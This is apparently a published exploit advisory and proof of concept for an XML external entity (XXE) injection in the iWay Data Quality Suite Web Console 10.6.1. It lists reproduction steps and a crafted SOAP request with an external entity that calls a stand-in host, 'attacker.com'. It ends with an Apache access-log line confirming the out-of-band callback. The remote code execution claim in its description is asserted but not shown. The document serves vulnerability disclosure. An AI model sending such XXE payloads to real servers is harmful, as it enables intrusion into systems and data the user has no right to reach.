42 lines
No EOL
1.5 KiB
Text
42 lines
No EOL
1.5 KiB
Text
# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 – XML External Entity Injection
|
||
# Google Dork: N/A
|
||
# Date: 2018-09-27
|
||
# Exploit Author: Sureshbabu Narvaneni#
|
||
# Author Blog : https://nullnews.in
|
||
# Vendor Homepage: www.informationbuilders.co.uk
|
||
# Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite
|
||
# Affected Version: 10.6.1.ga
|
||
# Category: WebApps
|
||
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
|
||
# CVE : N/A
|
||
|
||
# Technical Description:
|
||
# iWay Data Quality Suite Web Console provides web services features. As there is no
|
||
# validation present on the web services featured by product while processing
|
||
# the user input an attacker can easily inject external entities in the SOAP request and can
|
||
# achieve the successful Remote Code Execution on the server
|
||
|
||
# Proof Of Concept:
|
||
|
||
> Access the iWay DQS Web Console application section.
|
||
> Create an entry for web service and form a sample SOAP request.
|
||
> Send below crafted request to the server to confirm the vulnerability
|
||
|
||
<?xml version="1.0"?>
|
||
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]>
|
||
<soapenv:Envelope
|
||
xml:soapenv="http://schemas.xmlsoap.org/soap/envelope"
|
||
xmlns:ws="http://www.example.com/ws">
|
||
<soapenv:Header/>
|
||
<soapenv:Body>
|
||
<ws:test>
|
||
<ws:in>&xxe;</ws:in>
|
||
</ws:test>
|
||
</soapenv:Body>
|
||
</soapenv:Envelope>
|
||
|
||
> The below log shows that the web service component is vulnerable to XXE.
|
||
|
||
root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log
|
||
1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404
|
||
474 "-" "-" |